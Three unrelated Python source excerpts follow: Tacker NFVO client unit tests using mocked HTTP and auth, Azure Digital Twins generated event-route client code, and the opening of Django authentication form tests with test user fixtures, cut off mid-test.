group='connect_vnf_packages',
default=pipelines)
res = nfvo_client.VnfPackageRequest.download_vnf_packages(
uuidsentinel.vnf_pkg_id, artifacts)
self.assertIsInstance(res, io.BytesIO)
actual_zip = zipfile.ZipFile(res)
self.assert_zipfile(
actual_zip, [
expected_package_content_zip,
expected_vnfd_zip], artifacts)
return expected_connect_cnt
def test_download_vnf_packages_content_disposition(self):
fetch_base_url = os.path.join(self.url, uuidsentinel.vnf_pkg_id)
test_yaml_filepath = os.path.join(
'tacker/tests/etc/samples',
'vnfd_lcm_user_data.yaml')
with open(test_yaml_filepath, 'rb') as test_yaml_obj:
headers = {
'Content-Type': 'application/octet-stream',
'Content-Disposition':
'filename={}'.format(test_yaml_filepath)}
self.requests_mock.register_uri(
'GET',
os.path.join(
fetch_base_url,
'vnfd'),
content=test_yaml_obj.read(),
headers=headers,
status_code=200)
cfg.CONF.set_default(
name='pipeline',
group='connect_vnf_packages',
default=['vnfd'])
res = nfvo_client.VnfPackageRequest.download_vnf_packages(
uuidsentinel.vnf_pkg_id)
history = self.requests_mock.request_history
req_count = _count_mock_history(history, self.nfvo_url)
self.assertEqual(1, req_count)
self.assertIsInstance(res, io.BytesIO)
actual_zip = zipfile.ZipFile(res)
self.assert_zipfile(actual_zip, [], [test_yaml_filepath])
def test_download_vnf_packages_non_content_disposition_raise_download(
self):
fetch_base_url = os.path.join(self.url, uuidsentinel.vnf_pkg_id)
test_yaml_filepath = os.path.join(
'tacker/tests/etc/samples',
'vnfd_lcm_user_data.yaml')
with open(test_yaml_filepath, 'rb') as test_yaml_obj:
headers = {'Content-Type': 'application/octet-stream'}
self.requests_mock.register_uri(
'GET',
os.path.join(
fetch_base_url,
'vnfd'),
content=test_yaml_obj.read(),
headers=headers,
status_code=200)
cfg.CONF.set_default(
name='pipeline',
group='connect_vnf_packages',
default=['vnfd'])
self.assertRaises(
nfvo_client.FaliedDownloadContentException,
nfvo_client.VnfPackageRequest.download_vnf_packages,
uuidsentinel.vnf_pkg_id)
history = self.requests_mock.request_history
req_count = _count_mock_history(history, self.nfvo_url)
self.assertEqual(1, req_count)
def test_download_vnf_packages_with_retry_raise_not_found(self):
fetch_base_url = os.path.join(self.url, uuidsentinel.vnf_pkg_id)
self.requests_mock.register_uri(
'GET',
os.path.join(
fetch_base_url,
'package_content'),
headers=self.headers,
status_code=404)
try:
nfvo_client.VnfPackageRequest.download_vnf_packages(
uuidsentinel.vnf_pkg_id)
except requests.exceptions.RequestException as e:
self.assertEqual(404, e.response.status_code)
history = self.requests_mock.request_history
req_count = _count_mock_history(history, self.nfvo_url)
self.assertEqual(
cfg.CONF.connect_vnf_packages.retry_num + 1, req_count)
def test_download_vnf_packages_with_retry_raise_timeout(self):
fetch_base_url = os.path.join(self.url, uuidsentinel.vnf_pkg_id)
self.requests_mock.register_uri(
'GET',
os.path.join(
fetch_base_url,
'package_content'),
exc=requests.exceptions.ConnectTimeout)
try:
nfvo_client.VnfPackageRequest.download_vnf_packages(
uuidsentinel.vnf_pkg_id)
except requests.exceptions.RequestException as e:
self.assertIsNone(e.response)
history = self.requests_mock.request_history
req_count = _count_mock_history(history, self.nfvo_url)
self.assertEqual(
cfg.CONF.connect_vnf_packages.retry_num + 1, req_count)
def test_download_vnf_packages_raise_failed_download_content(self):
fetch_base_url = os.path.join(self.url, uuidsentinel.vnf_pkg_id)
self.requests_mock.register_uri('GET', os.path.join(
fetch_base_url, 'package_content'), content=None)
self.assertRaises(
nfvo_client.FaliedDownloadContentException,
nfvo_client.VnfPackageRequest.download_vnf_packages,
uuidsentinel.vnf_pkg_id)
history = self.requests_mock.request_history
req_count = _count_mock_history(history, self.nfvo_url)
self.assertEqual(1, req_count)
@ddt.data(None, "", " ")
def test_download_vnf_packages_raise_non_baseurl(self, empty_val):
cfg.CONF.set_override("base_url", empty_val,
group='connect_vnf_packages')
self.assertRaises(
nfvo_client.UndefinedExternalSettingException,
nfvo_client.VnfPackageRequest.download_vnf_packages,
uuidsentinel.vnf_pkg_id)
@ddt.data(None, [], ["non"])
def test_download_vnf_packages_raise_non_pipeline(self, empty_val):
cfg.CONF.set_override('pipeline', empty_val,
group='connect_vnf_packages')
self.assertRaises(
nfvo_client.UndefinedExternalSettingException,
nfvo_client.VnfPackageRequest.download_vnf_packages,
uuidsentinel.vnf_pkg_id)
def test_index(self):
response_body = self.json_serial_date_to_dict(
[fakes.VNFPACKAGE_RESPONSE, fakes.VNFPACKAGE_RESPONSE])
self.requests_mock.register_uri(
'GET', self.url, headers=self.headers, json=response_body)
res = nfvo_client.VnfPackageRequest.index()
self.assertEqual(200, res.status_code)
self.assertIsInstance(res.json(), list)
self.assertEqual(response_body, res.json())
self.assertEqual(2, len(res.json()))
self.assertEqual(response_body, json.loads(res.text))
history = self.requests_mock.request_history
req_count = _count_mock_history(history, self.nfvo_url)
self.assertEqual(1, req_count)
def test_index_with_auth_basic(self):
cfg.CONF.set_override('auth_type', 'BASIC',
group='authentication')
auth.auth_manager = auth._AuthManager()
response_body = self.json_serial_date_to_dict(
[fakes.VNFPACKAGE_RESPONSE, fakes.VNFPACKAGE_RESPONSE])
self.requests_mock.register_uri(
'GET', self.url, headers=self.headers, json=response_body)
res = nfvo_client.VnfPackageRequest.index()
self.assertEqual(200, res.status_code)
self.assertIsInstance(res.json(), list)
self.assertEqual(response_body, res.json())
self.assertEqual(2, len(res.json()))
self.assertEqual(response_body, json.loads(res.text))
history = self.requests_mock.request_history
req_count = _count_mock_history(history, self.nfvo_url)
self.assertEqual(1, req_count)
self.assert_auth_basic(history[0])
def test_index_with_auth_client_credentials(self):
cfg.CONF.set_override('auth_type', 'OAUTH2_CLIENT_CREDENTIALS',
group='authentication')
self.requests_mock.register_uri('POST',
self.token_endpoint,
json={'access_token': 'test_token', 'token_type': 'bearer'},
headers={'Content-Type': 'application/json'},
status_code=200)
auth.auth_manager = auth._AuthManager()
response_body = self.json_serial_date_to_dict(
[fakes.VNFPACKAGE_RESPONSE, fakes.VNFPACKAGE_RESPONSE])
self.requests_mock.register_uri(
'GET', self.url, headers=self.headers, json=response_body)
res = nfvo_client.VnfPackageRequest.index()
self.assertEqual(200, res.status_code)
self.assertIsInstance(res.json(), list)
self.assertEqual(response_body, res.json())
self.assertEqual(2, len(res.json()))
self.assertEqual(response_body, json.loads(res.text))
history = self.requests_mock.request_history
req_count = _count_mock_history(history, self.nfvo_url, self.oauth_url)
self.assertEqual(2, req_count)
self.assert_auth_basic(history[0])
self.assert_auth_client_credentials(history[1], "test_token")
def test_index_raise_not_found(self):
self.requests_mock.register_uri(
'GET', self.url, headers=self.headers, status_code=404)
try:
nfvo_client.VnfPackageRequest.index()
except requests.exceptions.RequestException as e:
self.assertEqual(404, e.response.status_code)
history = self.requests_mock.request_history
req_count = _count_mock_history(history, self.nfvo_url)
self.assertEqual(
cfg.CONF.connect_vnf_packages.retry_num + 1, req_count)
def test_index_raise_non_baseurl(self):
cfg.CONF.set_override("base_url", None,
group='connect_vnf_packages')
self.assertRaises(nfvo_client.UndefinedExternalSettingException,
nfvo_client.VnfPackageRequest.index)
def test_show(self):
response_body = self.json_serial_date_to_dict(
fakes.VNFPACKAGE_RESPONSE)
self.requests_mock.register_uri(
'GET',
os.path.join(
self.url,
uuidsentinel.vnf_pkg_id),
headers=self.headers,
json=response_body)
res = nfvo_client.VnfPackageRequest.show(uuidsentinel.vnf_pkg_id)
self.assertEqual(200, res.status_code)
self.assertIsInstance(res.json(), dict)
self.assertEqual(response_body, res.json())
self.assertEqual(response_body, json.loads(res.text))
history = self.requests_mock.request_history
req_count = _count_mock_history(history, self.nfvo_url)
self.assertEqual(1, req_count)
def test_show_with_auth_basic(self):
cfg.CONF.set_override('auth_type', 'BASIC',
group='authentication')
auth.auth_manager = auth._AuthManager()
response_body = self.json_serial_date_to_dict(
fakes.VNFPACKAGE_RESPONSE)
self.requests_mock.register_uri(
'GET',
os.path.join(
self.url,
uuidsentinel.vnf_pkg_id),
headers=self.headers,
json=response_body)
res = nfvo_client.VnfPackageRequest.show(uuidsentinel.vnf_pkg_id)
self.assertEqual(200, res.status_code)
self.assertIsInstance(res.json(), dict)
self.assertEqual(response_body, res.json())
self.assertEqual(response_body, json.loads(res.text))
history = self.requests_mock.request_history
req_count = _count_mock_history(history, self.nfvo_url)
self.assertEqual(1, req_count)
self.assert_auth_basic(history[0])
def test_show_with_auth_client_credentials(self):
cfg.CONF.set_override('auth_type', 'OAUTH2_CLIENT_CREDENTIALS',
group='authentication')
self.requests_mock.register_uri('POST',
self.token_endpoint,
json={'access_token': 'test_token', 'token_type': 'bearer'},
headers={'Content-Type': 'application/json'},
status_code=200)
auth.auth_manager = auth._AuthManager()
response_body = self.json_serial_date_to_dict(
fakes.VNFPACKAGE_RESPONSE)
self.requests_mock.register_uri(
'GET',
os.path.join(
self.url,
uuidsentinel.vnf_pkg_id),
headers=self.headers,
json=response_body)
res = nfvo_client.VnfPackageRequest.show(uuidsentinel.vnf_pkg_id)
self.assertEqual(200, res.status_code)
self.assertIsInstance(res.json(), dict)
self.assertEqual(response_body, res.json())
self.assertEqual(response_body, json.loads(res.text))
history = self.requests_mock.request_history
req_count = _count_mock_history(history, self.nfvo_url, self.oauth_url)
self.assertEqual(2, req_count)
self.assert_auth_basic(history[0])
self.assert_auth_client_credentials(history[1], "test_token")
def test_show_raise_not_found(self):
self.requests_mock.register_uri(
'GET',
os.path.join(
self.url,
uuidsentinel.vnf_pkg_id),
headers=self.headers,
status_code=404)
try:
nfvo_client.VnfPackageRequest.show(uuidsentinel.vnf_pkg_id)
except requests.exceptions.RequestException as e:
self.assertEqual(404, e.response.status_code)
history = self.requests_mock.request_history
req_count = _count_mock_history(history, self.nfvo_url)
self.assertEqual(
cfg.CONF.connect_vnf_packages.retry_num + 1, req_count)
def test_show_raise_non_baseurl(self):
cfg.CONF.set_override("base_url", None,
group='connect_vnf_packages')
self.assertRaises(nfvo_client.UndefinedExternalSettingException,
nfvo_client.VnfPackageRequest.show,
uuidsentinel.vnf_pkg_id)
@ddt.ddt
class TestGrantRequest(base.BaseTestCase):
def setUp(self):
super(TestGrantRequest, self).setUp()
self.requests_mock = self.useFixture(requests_mock_fixture.Fixture())
self.url = "http://nfvo.co.jp/grant/v1/grants"
self.nfvo_url = 'http://nfvo.co.jp'
self.headers = {'content-type': 'application/json'}
self.token_endpoint = 'https://oauth2/tokens'
self.nfvo_url = 'http://nfvo.co.jp'
self.oauth_url = 'https://oauth2'
self.auth_user_name = 'test_user'
self.auth_password = 'test_password'
cfg.CONF.set_override('auth_type', None,
group='authentication')
cfg.CONF.set_override("base_url", self.url, group='connect_grant')
cfg.CONF.set_override('user_name', self.auth_user_name,
group='authentication')
cfg.CONF.set_override('password', self.auth_password,
group='authentication')
cfg.CONF.set_override('token_endpoint', self.token_endpoint,
group='authentication')
cfg.CONF.set_override('client_id', self.auth_user_name,
group='authentication')
cfg.CONF.set_override('client_password', self.auth_password,
group='authentication')
auth.auth_manager = auth._AuthManager()
nfvo_client.GrantRequest._connector = nfvo_client._Connect(2, 1, 20)
def tearDown(self):
super(TestGrantRequest, self).tearDown()
self.addCleanup(mock.patch.stopall)
def assert_auth_basic(self, acutual_request):
actual_auth = acutual_request._request.headers.get("Authorization")
expected_auth = base64.b64encode(
'{}:{}'.format(
self.auth_user_name,
self.auth_password).encode('utf-8')).decode()
self.assertEqual("Basic " + expected_auth, actual_auth)
def assert_auth_client_credentials(self, acutual_request, expected_token):
actual_auth = acutual_request._request.headers.get(
"Authorization")
self.assertEqual("Bearer " + expected_token, actual_auth)
def create_request_body(self):
return {
"vnfInstanceId": uuidsentinel.vnf_instance_id,
"vnfLcmOpOccId": uuidsentinel.vnf_lcm_op_occ_id,
"operation": "INST",
"isAutomaticInvocation": False,
"links": {
"vnfLcmOpOcc": {
"href":
"https://localost/vnfm/vnflcm/v1/vnf_lcm_op_occs/" +
uuidsentinel.vnf_lcm_op_occ_id},
"vnfInstance": {
"href": "https://localost/vnfm/vnflcm/v1/vnf_instances/" +
uuidsentinel.vnf_instance_id}}}
def fake_response_body(self):
return {
"id": uuidsentinel.grant_id,
"vnfInstanceId": uuidsentinel.vnf_instance_id,
"vnfLcmOpOccId": uuidsentinel.vnf_lcm_op_occ_id,
"additionalParams": {},
"_links": {
"self": {
"href":
"http://nfvo.co.jp/grant/v1/grants/\
19533fd4-eacb-4e6f-acd9-b56210a180d7"},
"vnfLcmOpOcc": {
"href":
"https://localost/vnfm/vnflcm/v1/vnf_lcm_op_occs/" +
uuidsentinel.vnf_lcm_op_occ_id},
"vnfInstance": {
"href": "https://localost/vnfm/vnflcm/v1/vnf_instances/" +
uuidsentinel.vnf_instance_id}}}
def test_init(self):
self.assertEqual(self.url, cfg.CONF.connect_grant.base_url)
self.assertEqual(2, cfg.CONF.connect_grant.retry_num)
self.assertEqual(30, cfg.CONF.connect_grant.retry_wait)
self.assertEqual(20, cfg.CONF.connect_grant.timeout)
def test_grants(self):
response_body = self.fake_response_body()
self.requests_mock.register_uri(
'POST',
self.url,
json=response_body,
headers=self.headers,
status_code=201)
request_body = self.create_request_body()
res = nfvo_client.GrantRequest.grants(data=request_body)
self.assertEqual(response_body, json.loads(res.text))
self.assertEqual(response_body, res.json())
history = self.requests_mock.request_history
req_count = _count_mock_history(history, self.nfvo_url)
self.assertEqual(1, req_count)
def test_grants_with_retry_raise_bad_request(self):
response_body = self.fake_response_body()
self.requests_mock.register_uri('POST', self.url, json=json.dumps(
response_body), headers=self.headers, status_code=400)
request_body = self.create_request_body()
try:
nfvo_client.GrantRequest.grants(data=request_body)
except requests.exceptions.RequestException as e:
self.assertEqual(400, e.response.status_code)
history = self.requests_mock.request_history
req_count = _count_mock_history(history, self.nfvo_url)
self.assertEqual(
cfg.CONF.connect_grant.retry_num + 1, req_count)
def test_grants_with_retry_raise_timeout(self):
self.requests_mock.register_uri(
'POST', self.url, exc=requests.exceptions.ConnectTimeout)
request_body = self.create_request_body()
try:
nfvo_client.GrantRequest.grants(data=request_body)
except requests.exceptions.RequestException as e:
self.assertIsNone(e.response)
history = self.requests_mock.request_history
req_count = _count_mock_history(history, self.nfvo_url)
self.assertEqual(
cfg.CONF.connect_grant.retry_num + 1, req_count)
@ddt.data(None, "", " ")
def test_grants_raise_non_baseurl(self, empty_val):
cfg.CONF.set_override("base_url", empty_val, group='connect_grant')
self.assertRaises(nfvo_client.UndefinedExternalSettingException,
nfvo_client.GrantRequest.grants,
data={"test": "value1"})
def test_grants_with_auth_basic(self):
cfg.CONF.set_override('auth_type', 'BASIC',
group='authentication')
auth.auth_manager = auth._AuthManager()
response_body = self.fake_response_body()
self.requests_mock.register_uri(
'POST',
self.url,
json=response_body,
headers=self.headers,
status_code=201)
request_body = self.create_request_body()
res = nfvo_client.GrantRequest.grants(data=request_body)
self.assertEqual(response_body, json.loads(res.text))
self.assertEqual(response_body, res.json())
history = self.requests_mock.request_history
req_count = _count_mock_history(history, self.nfvo_url)
self.assertEqual(1, req_count)
self.assert_auth_basic(history[0])
def test_grants_with_auth_client_credentials(self):
cfg.CONF.set_override('auth_type', 'OAUTH2_CLIENT_CREDENTIALS',
group='authentication')
self.requests_mock.register_uri('POST',
self.token_endpoint,
json={'access_token': 'test_token', 'token_type': 'bearer'},
headers={'Content-Type': 'application/json'},
status_code=200)
auth.auth_manager = auth._AuthManager()
response_body = self.fake_response_body()
self.requests_mock.register_uri(
'POST',
self.url,
json=response_body,
headers=self.headers,
status_code=201)
request_body = self.create_request_body()
res = nfvo_client.GrantRequest.grants(data=request_body)
self.assertEqual(response_body, json.loads(res.text))
self.assertEqual(response_body, res.json())
history = self.requests_mock.request_history
req_count = _count_mock_history(history, self.nfvo_url, self.oauth_url)
self.assertEqual(2, req_count)
self.assert_auth_basic(history[0])
self.assert_auth_client_credentials(history[1], "test_token")
|
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class EventRoutesOperations(object):
"""EventRoutesOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.digitaltwins.core.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list(
self,
event_routes_list_options=None, # type: Optional["_models.EventRoutesListOptions"]
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.EventRouteCollection"]
"""Retrieves all event routes.
Status codes:
* 200 OK.
:param event_routes_list_options: Parameter group.
:type event_routes_list_options: ~azure.digitaltwins.core.models.EventRoutesListOptions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either EventRouteCollection or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.digitaltwins.core.models.EventRouteCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.EventRouteCollection"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
_traceparent = None
_tracestate = None
_max_items_per_page = None
if event_routes_list_options is not None:
_traceparent = event_routes_list_options.traceparent
_tracestate = event_routes_list_options.tracestate
_max_items_per_page = event_routes_list_options.max_items_per_page
api_version = "2020-10-31"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if _traceparent is not None:
header_parameters['traceparent'] = self._serialize.header("traceparent", _traceparent, 'str')
if _tracestate is not None:
header_parameters['tracestate'] = self._serialize.header("tracestate", _tracestate, 'str')
if _max_items_per_page is not None:
header_parameters['max-items-per-page'] = self._serialize.header("max_items_per_page", _max_items_per_page, 'int')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('EventRouteCollection', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(_models.ErrorResponse, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/eventroutes'} # type: ignore
def get_by_id(
self,
id, # type: str
event_routes_get_by_id_options=None, # type: Optional["_models.EventRoutesGetByIdOptions"]
**kwargs # type: Any
):
# type: (...) -> "_models.DigitalTwinsEventRoute"
"""Retrieves an event route.
Status codes:
* 200 OK
* 404 Not Found
* EventRouteNotFound - The event route was not found.
:param id: The id for an event route. The id is unique within event routes and case sensitive.
:type id: str
:param event_routes_get_by_id_options: Parameter group.
:type event_routes_get_by_id_options: ~azure.digitaltwins.core.models.EventRoutesGetByIdOptions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: DigitalTwinsEventRoute, or the result of cls(response)
:rtype: ~azure.digitaltwins.core.models.DigitalTwinsEventRoute
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DigitalTwinsEventRoute"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
_traceparent = None
_tracestate = None
if event_routes_get_by_id_options is not None:
_traceparent = event_routes_get_by_id_options.traceparent
_tracestate = event_routes_get_by_id_options.tracestate
api_version = "2020-10-31"
accept = "application/json"
# Construct URL
url = self.get_by_id.metadata['url'] # type: ignore
path_format_arguments = {
'id': self._serialize.url("id", id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if _traceparent is not None:
header_parameters['traceparent'] = self._serialize.header("traceparent", _traceparent, 'str')
if _tracestate is not None:
header_parameters['tracestate'] = self._serialize.header("tracestate", _tracestate, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('DigitalTwinsEventRoute', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_by_id.metadata = {'url': '/eventroutes/{id}'} # type: ignore
def add(
self,
id, # type: str
event_route=None, # type: Optional["_models.DigitalTwinsEventRoute"]
event_routes_add_options=None, # type: Optional["_models.EventRoutesAddOptions"]
**kwargs # type: Any
):
# type: (...) -> None
"""Adds or replaces an event route.
Status codes:
* 204 No Content
* 400 Bad Request
* EventRouteEndpointInvalid - The endpoint provided does not exist or is not active.
* EventRouteFilterInvalid - The event route filter is invalid.
* EventRouteIdInvalid - The event route id is invalid.
* LimitExceeded - The maximum number of event routes allowed has been reached.
:param id: The id for an event route. The id is unique within event routes and case sensitive.
:type id: str
:param event_route: The event route data.
:type event_route: ~azure.digitaltwins.core.models.DigitalTwinsEventRoute
:param event_routes_add_options: Parameter group.
:type event_routes_add_options: ~azure.digitaltwins.core.models.EventRoutesAddOptions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
_traceparent = None
_tracestate = None
if event_routes_add_options is not None:
_traceparent = event_routes_add_options.traceparent
_tracestate = event_routes_add_options.tracestate
api_version = "2020-10-31"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.add.metadata['url'] # type: ignore
path_format_arguments = {
'id': self._serialize.url("id", id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if _traceparent is not None:
header_parameters['traceparent'] = self._serialize.header("traceparent", _traceparent, 'str')
if _tracestate is not None:
header_parameters['tracestate'] = self._serialize.header("tracestate", _tracestate, 'str')
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
if event_route is not None:
body_content = self._serialize.body(event_route, 'DigitalTwinsEventRoute')
else:
body_content = None
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
add.metadata = {'url': '/eventroutes/{id}'} # type: ignore
def delete(
self,
id, # type: str
event_routes_delete_options=None, # type: Optional["_models.EventRoutesDeleteOptions"]
**kwargs # type: Any
):
# type: (...) -> None
"""Deletes an event route.
Status codes:
* 204 No Content
* 404 Not Found
* EventRouteNotFound - The event route was not found.
:param id: The id for an event route. The id is unique within event routes and case sensitive.
:type id: str
:param event_routes_delete_options: Parameter group.
:type event_routes_delete_options: ~azure.digitaltwins.core.models.EventRoutesDeleteOptions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
_traceparent = None
_tracestate = None
if event_routes_delete_options is not None:
_traceparent = event_routes_delete_options.traceparent
_tracestate = event_routes_delete_options.tracestate
api_version = "2020-10-31"
accept = "application/json"
# Construct URL
url = self.delete.metadata['url'] # type: ignore
path_format_arguments = {
'id': self._serialize.url("id", id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if _traceparent is not None:
header_parameters['traceparent'] = self._serialize.header("traceparent", _traceparent, 'str')
if _tracestate is not None:
header_parameters['tracestate'] = self._serialize.header("tracestate", _tracestate, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
delete.metadata = {'url': '/eventroutes/{id}'} # type: ignore
|
|
from __future__ import unicode_literals
import datetime
import re
from django import forms
from django.contrib.auth.forms import (
AdminPasswordChangeForm, AuthenticationForm, PasswordChangeForm,
PasswordResetForm, ReadOnlyPasswordHashField, ReadOnlyPasswordHashWidget,
SetPasswordForm, UserChangeForm, UserCreationForm,
)
from django.contrib.auth.models import User
from django.contrib.sites.models import Site
from django.core import mail
from django.core.mail import EmailMultiAlternatives
from django.forms.fields import CharField, Field
from django.test import SimpleTestCase, TestCase, mock, override_settings
from django.utils import translation
from django.utils.encoding import force_text
from django.utils.text import capfirst
from django.utils.translation import ugettext as _
from .settings import AUTH_TEMPLATES
class TestDataMixin(object):
@classmethod
def setUpTestData(cls):
cls.u1 = User.objects.create(
password='sha1$6efc0$f93efe9fd7542f25a7be94871ea45aa95de57161',
last_login=datetime.datetime(2006, 12, 17, 7, 3, 31), is_superuser=False, username='testclient',
first_name='Test', last_name='Client', email='testclient@example.com', is_staff=False, is_active=True,
date_joined=datetime.datetime(2006, 12, 17, 7, 3, 31)
)
cls.u2 = User.objects.create(
password='sha1$6efc0$f93efe9fd7542f25a7be94871ea45aa95de57161',
last_login=datetime.datetime(2006, 12, 17, 7, 3, 31), is_superuser=False, username='inactive',
first_name='Inactive', last_name='User', email='testclient2@example.com', is_staff=False, is_active=False,
date_joined=datetime.datetime(2006, 12, 17, 7, 3, 31)
)
cls.u3 = User.objects.create(
password='sha1$6efc0$f93efe9fd7542f25a7be94871ea45aa95de57161',
last_login=datetime.datetime(2006, 12, 17, 7, 3, 31), is_superuser=False, username='staff',
first_name='Staff', last_name='Member', email='staffmember@example.com', is_staff=True, is_active=True,
date_joined=datetime.datetime(2006, 12, 17, 7, 3, 31)
)
cls.u4 = User.objects.create(
password='', last_login=datetime.datetime(2006, 12, 17, 7, 3, 31), is_superuser=False,
username='empty_password', first_name='Empty', last_name='Password', email='empty_password@example.com',
is_staff=False, is_active=True, date_joined=datetime.datetime(2006, 12, 17, 7, 3, 31)
)
cls.u5 = User.objects.create(
password='$', last_login=datetime.datetime(2006, 12, 17, 7, 3, 31), is_superuser=False,
username='unmanageable_password', first_name='Unmanageable', last_name='Password',
email='unmanageable_password@example.com', is_staff=False, is_active=True,
date_joined=datetime.datetime(2006, 12, 17, 7, 3, 31)
)
cls.u6 = User.objects.create(
password='foo$bar', last_login=datetime.datetime(2006, 12, 17, 7, 3, 31), is_superuser=False,
username='unknown_password', first_name='Unknown', last_name='Password',
email='unknown_password@example.com', is_staff=False, is_active=True,
date_joined=datetime.datetime(2006, 12, 17, 7, 3, 31)
)
@override_settings(USE_TZ=False, PASSWORD_HASHERS=['django.contrib.auth.hashers.SHA1PasswordHasher'])
class UserCreationFormTest(TestDataMixin, TestCase):
def test_user_already_exists(self):
data = {
'username': 'testclient',
'password1': 'test123',
'password2': 'test123',
}
form = UserCreationForm(data)
self.assertFalse(form.is_valid())
self.assertEqual(form["username"].errors,
[force_text(User._meta.get_field('username').error_messages['unique'])])
def test_invalid_data(self):
data = {
'username': 'jsmith!',
'password1': 'test123',
'password2': 'test123',
}
form = UserCreationForm(data)
self.assertFalse(form.is_valid())
validator = next(v for v in User._meta.get_field('username').validators if v.code == 'invalid')
self.assertEqual(form["username"].errors, [force_text(validator.message)])
def test_password_verification(self):
# The verification password is incorrect.
data = {
